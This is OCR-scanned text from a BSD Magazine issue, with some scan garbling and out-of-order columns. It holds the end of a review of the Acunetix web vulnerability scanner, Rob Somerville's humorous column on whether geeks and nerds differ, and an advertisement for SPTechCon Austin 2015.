¢ Online Scan with Acunetix — https:/,www.acunetix.com/vulnerability-scanner/register-online-vulnerability-scanner/ 

¢« Audit Your Website Security with Acunetix Web Vulnerability Scanner — https:/www.acunetix.com/vulnerability-scanner/ 

¢« Advanced Pen-Testing Tools — https://www.acunetix.com/vulnerability-scanner/pen-testing-tools/ 

¢« Regulatory Compliance Reports for PCI, HIPAA and others — https:/~www.acunetix.com/vulnerability-scanner/pci-regulatory-com- 
pliance/ 

¢ AcuMonitor Service — http:/www.acunetix.com/websitesecurity/acumonitor/ 











About Acunetix 

Securing the web applications of today’s businesses is perhaps the most overlooked aspect of securing the enterprise. Web applica- 
tion hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have 
secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnera- 
ble to attack. Web applications — which often have a direct line into the company’s most valuable data assets — are online 24/7, com- 
pletely unprotected by a firewall and therefore easy prey for attackers. 

Acunetix was founded with this threat in mind. It was understood that the only way to combat website hacking was to develop an 
automated tool that could help companies scan their web applications to identify and resolve exploitable vulnerabilities. In July 2005, 
Acunetix Web Vulnerability Scanner was released — a heuristic tool designed to replicate a hacker’s methodology to find dangerous 
vulnerabilities — like SQL injection and cross site scripting — before hackers do. Acunetix WVS brings an extensive feature-set of both 
automated and manual penetration testing tools, enabling security analysts to perform a complete vulnerability assessment, and re- 
pair detected threats, with just the one product. 

The Acunetix development team consists of highly experienced security developers, all with extensive development expe- 
rience in network security scanning software prior to working on Acunetix WVS. The management team is backed by years of 


experience in marketing and selling security software. 
From www.acunetix.com 











¢ Acunetix provides CVE, CVSS, CWE scores either 
in the results or in the reports, as well as OWASP, 
SANS reports. Results can be compared using Acu- 
netix result comparison. Of course risk would need to 
be further assessed on the basis of the target app im- 
portance. If Acunetix is repeatedly used on multiple 
targets then data aggregation solutions need to be 
made available. 

¢ Acunetix results can be consumed by a vulnerabil- 
ity data management system to address more man- 
agement requirements. These solutions would use 
Acunetix XML outputs to integrate with Vulnerability 
Management aggregation tools such as one particu- 
lar Technology Partner Acunetix works with whereby 
the vulnerability information resulting from multiple or- 
chestrated scans and/or scanners would be overlaid 
onto a matrix of applications classified by importance 
to help prioritize remediation tasks. That system 
comes complete with defect tracking and manage- 
ment system integration which then lines up tasks for 
developers in an SDLC environment to look into. Acu- 
netix can point to and support integration with such 
solutions that could be deployed to achieve these 


www.bsdmag.org 


goals at a fee if not already available out of the box 
as with particular Technology Partners. 


Conclusion 

As | mentioned earlier, this is the first opportunity | had to 
try Acunetix for any length of time. It has all the features 
and functionality that allows the product to compete with 
the “big boys” in the field but is also reasonably priced. 
Acunetix is a solid product to get your Application Security 
Testing program off the ground. As always ensure that you 
understand your SDLC so that you get the coverage you 
need to test. Acunetix has also recently released an on- 
line version of the scanner for the audit of public internet 
facing Web Servers and Network Interfaces. You need to 
check yourself (so follow the link in “On the Net” frame). 


MICHAEL ORTEGA 
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Is There a Difference Between Geeks 


and Nerds? 


Forget the Internet wars about vi versus Emacs or Windows 
versus Linux. Burr Settles has analysed the language of 2.6 
million tweets to attempt to answer the contentious question 
“Is there a difference between Geeks and Nerds?” Let the 


debate begin. 


watched a number of video commentaries and 
consumed quite a few articles on the subject, my 
personal rating is very probably “Gerd”, a mixture of the 
two. Whereas Nerd is always used as a derogatory term, 
Geek has a trendier, more metro connotation although 
personally | still strongly dislike both terms. As an un- 
ashamed, in-your-face Gerd | would like to bring some 
peace and unity to both camps — we share more than our 
critics would like to admit. 
One word | have continually been described as through- 
out my life is “Deep”. | suspect that term has been applied 


) . aving read Burr Settles analysis of the data, 


examine our commonalities in light of the social major- 
ity, rather than bring division — after all, society at large is 
rather wary of us, hence the pigeon-holing, name calling, 
and the tag “Being different”. Fear and insecurity is a very 
strong motivator in the hive mind. 

So let’s get back to Deep. My wife has accused me of 
it, some of colleagues at work have, and very few friends 
who know me well would tend to describe me any oth- 
er way. My immediate retort to this is “Define what you 
mean by deep?” — which in a paradoxically, holistic way 
not only challenges the person making the assertion, but 
also answers the question. Gerds refuse to take things at 





to both Geeks and Nerds in equal measure, so | am go- 
ing to tentatively suggest that we generally have much 
more in common than we have differences, so rather than 
type Geeks and Nerds throughout this article, | will use 
the collective term “Gerd” from now on. Of course, indi- 
viduals will rate differently on this spectrum, but | want to 
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face value, always scratching below the surface. Some 
are content with empirical evidence, some are less sat- 
isfied with classical definitions but the resounding trait 
is to ask questions and search for answers — and quite 
often questions that are taboo, impolite, or just off the 
scale. The point is that we have learned early on in life 
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Is There a Difference Between Geeks and Nerds? 


that most non-gerds tend to live very different lives than 
we do, one of the major traits being that we live in our 
heads. While we really do enjoy social interaction, it has 
got to be based on quality and interchange, rather than 
superficial social convention and a pretend mask of civili- 
sation. | recently shocked a colleague at work who asked 
[in social niceties mode] “How are you Rob?” and got the 
blunt but honest [totally fed up with BS mode] “Rather 
p*ss*d off” reply. | did apologise, but it goes to illustrate 
why Gerds are classed as socially inept. | should have 
just smiled, said “Oh so-so” and not revealed my true 
feelings, but society dictates (at least on this island) that 
you wear your heart on your sleeve at your peril, stiff up- 
per lip and all that. To me, that smacks of duplicity, if you 
don't genuinely want to know where someone is at, don't 
ask them. Sure, talk about the weather, the price of fish 
— anything — but please don't place me in position where 
| have to effectively lie to you as it makes me feel very 
uncomfortable. On the scale of 1-10 of cardinal sins, our 
social interaction “sleights of hand” may be insignificant, 
but they are cumulative. No wonder we live in a society 
where the culture is so superficial, true education and 
wisdom shunned, and people feel disconnected and iso- 
lated. Most of the time | join my fellow conspirators and 
“play the game” but it does nothing but reinforce my be- 
lief that the majority of people (outside of the Gerd com- 
munity) walk to the beat of a different drum. 

| believe that all Gerds feel that their value systems have 
been betrayed at sometime in their life. Maybe it was to- 
tally believing in Santa Claus and discovering you were — 
whilst not deliberately — effectively lied to (my first person- 
al recollection of worldview shock) or maybe it was just 
being clever and different in an amorphous peer group. 
With large ears, thick spectacles, and a comprehensive 
vocabulary at school | was obvious Gerd material. The fa- 
vourite insult thrown in my direction was “You swallowed 
a dictionary?” (My 14 year old daughter also accuses me 
of this, but having chatted to her about it, there is a se- 
cret pride there in her old dad, so | don’t mind too much). 
This fracture in perception, the understanding that the 
world is a very different place from what we understand to 
be internally, is what makes Gerds, Gerds. We withdraw 





from the superficiality of human interaction with its mov- 
able values and eccentricities into a more clearly defined 
space, where the rules are more easily learned and rigor- 
ously enforced. Take computing for instance, no matter 
how much you yell at a computer, or how expensive your 
suit, or how important the deadline, or how much you love 
it (or lust after it for that matter) — it will not work unless 
you play by a strict set of immutable rules. Try applying 
that methodology in the workplace. People get promot- 
ed on the basis of gender, looks or connections, they are 
fired for speaking the truth. The power of personality rules 
and corporate culture then becomes an amalgam of those 
who most effectively play this very subtle game. In other 
words success regardless of talent, experience, logic or 
knowledge. No wonder Gerds retire to a quiet corner with 
a thick book or a green screen terminal and a tape drive. 

Society has this pathological addiction to classifying 
and judging people on such superficial metrics as looks, 
fashion, intelligence, money, education, race, national- 
ity or gender. Like everyone else on this planet, | am an 
unique individual of value. Treat me as such and do not 
fold, spindle or mutilate. Hence my pungent distaste at be- 
ing labelled a Gerd or indeed “Deep”. Please feel free to 
categorise me as such, provided | can categorise you as 
a living testimony to a grey mush of social conformity. Un- 
less of course you are a Geek or a Nerd, in which case | 
will take it as a compliment from a peer. 

lronically, my employer is sending everyone on a diver- 
sity and equality training course, and | have prepared well 
for this. My Unix beard is long but neat and my hair is just 
long enough to form a decent ponytail. Maybe | should 
just hand this article in instead. 


ROB SOMERVILLE 

Rob Somerville has been passionate about technology since his early 
teens. A keen advocate of open systems since the mid-eighties, he has 
worked in many corporate sectors including finance, automotive, air- 
lines, government and media in a variety of roles from technical sup- 
port, system administrator, developer, systems integrator and IT man- 
ager. He has moved on from CP/M and nixie tubes but keeps a solder- 
ing iron handy just in case. 
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The BIGGEST, the BEST, the TEXAS he 
SharePoint Conference ever! 





SharePoint is at the Crossroads — SPTechCon 
Which Way Will You Go? 2 


SharePoint in the cloud or on premises? Or both? Come to SPTechCon Austin _ 

2015 and learn about the differences between Office 365, cloud-hosted Februa ry 5 ] l : 201 o 
SharePoint, on-premises SharePoint, and hybrid solutions and build your Renaissance Austin Hotel 
company’s SharePoint Roadmap! 

For developers, the future means a new app model and new app paradigms. SO+ Classes 

For IT pros and SharePoint admins, it’s trying to retain control over an installa- 

tion that’s now in the cloud. For information workers and their managers, it’s AO + Microsoft FX ert 
about learning how to work ‘social.’ But it’s not for everyone. p 
Where do you need to be? Speakers 

The answer is simple: SPTechCon Austin. With a collection of the top _Ci 
SharePoint MVPs and expert speakers, more than 80 classes and tutorials Get Your Texas Sized 
to choose from and panels focused on the changes in SharePoint, Registration Discount— 


SPTechCon will teach you how to master the present and plan for the future. 


Register NOW! 


A Event 


